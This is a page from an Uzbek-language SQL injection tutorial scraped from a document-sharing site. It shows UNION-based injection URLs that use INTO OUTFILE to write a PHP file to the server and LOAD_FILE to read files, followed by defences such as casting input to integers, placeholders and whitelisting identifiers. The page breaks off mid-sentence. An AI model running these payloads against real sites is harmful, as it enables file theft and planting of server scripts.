• Fayllarni oqish Fayllarni oqish ularni yozishdan ham osonroqdir. Biz tanlagan maydon orniga LOAD_FILE
  • Himoya usullari
    		•

    Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017




    Download 67,89 Kb.
    bet5/24
    Sana20.05.2024
    Hajmi67,89 Kb.
    #246484
    1   2   3   4   5   6   7   8   9   ...   24
    Bog'liq
    Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan -hozir.org

    Fayllarni o'qish/yozish
    Fayllarni o'qish va yozish uchun ma'lumotlar bazasi foydalanuvchisi FILE_PRIV ruxsatiga ega bo'lishi kerak.


    Fayllarni yozish
    Aslida, hamma narsa juda oddiy. Fayl yozish uchun biz OUTFILE funksiyasidan foydalanamiz .
    sqlinj/index2.php?user=-1' UNION SELECT 1,2,3,4,5 INTO OUTFILE '1.php' --%20
    Ajoyib , fayl bizda yozildi. Shu kabi, biz skript yozishimiz mumkin:
    sqlinj/index2.php?user=-1' UNION SELECT 1,'',3,4,5 INTO OUTFILE '1.php' --%20
    Fayllarni o'qish
    Fayllarni o'qish ularni yozishdan ham osonroqdir. Biz tanlagan maydon o'rniga
    LOAD_FILE funksiyasidan foydalaning :
    sqlinj/index2.php?user=-1' UNION SELECT 1,LOAD_FILE('1.php'),3,4,5 --%20
    Shunday qilib, biz o'qib chiqdik. oldingi yozilgan fayl.


    Himoya usullari
    O'zingizni himoya qilish zaiflikdan foydalanishdan ham osonroqdir. Faqat ma'lumotlarni filtrlang. Agar siz raqamlarni uzatayotgan bo'lsangiz, foydalaning
    $id = (int) $_GET['id'];


    PHP va MySQL -da SQL in'ektsiyasi himoyasi
    PlaceHolder – Marketingda to'ldiruvchi shakl maydoni ichidagi maslahatdir. Masalan, "Parol" maydoniga "Kamida 6 ta belgi" kiritishingiz kerak bo'lgan maslahatni kiritishingiz mumkin. Texnologiya ma'lumotlarni kiritish jarayonini osonlashtirish uchun yaratilgan. Ushbu PlaceHolder iborasini biz “To`ldiruvchi” deb yuritamiz.

    Bizni in'ektsiyadan himoya qiladigan qoidalar


    1. to'ldiruvchilar orqali almashtiriladi


    2. biz identifikatorlar va kalit so'zlarni faqat kodimizda ko'rsatilgan oq ro'yxatga almashtiramiz.


    Faqat ikkita qoida.


    Albatta, ushbu qoidalarni amalda qo'llash batafsilroq yoritishni talab qiladi.Lekin bu ro'yxat katta afzalliklarga ega - bu aniq va to'liq. Ommabop singdirilgan " mysql_real_escape_string orqali foydalanuvchi kiritishidan qochish " yoki "har doim tayyorlangan bayonotlardan foydalanish" qoidalaridan farqli o'laroq, ushbu qoidalar to'plami halokatli noto'g'ri (avvalgisi kabi) yoki to'liq emas (ikkinchisi kabi) emas.
    Ammo keling, batafsil tahlilga o'tamiz.
    To'ldiruvchilar - ma'lumotlarni almashtirish
    Asosan, bu erda hamma narsa oddiy: har qanday ma'lumot so'rovni to'g'ridan-to'g'ri kiritmasligi kerak, lekin ma'lum bir vakil orqali, joker belgi orqali.So'rov shunday shaklda yoziladi, masalan,

    Download 67,89 Kb.
    1   2   3   4   5   6   7   8   9   ...   24




    Download 67,89 Kb.
    Bosh sahifa
    Aloqalar
        Bosh sahifa
    Dərs
    Mühazirə
    Qaydalar
    Referat
    Xülasə
    Yazı


    Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017

    Download 67,89 Kb.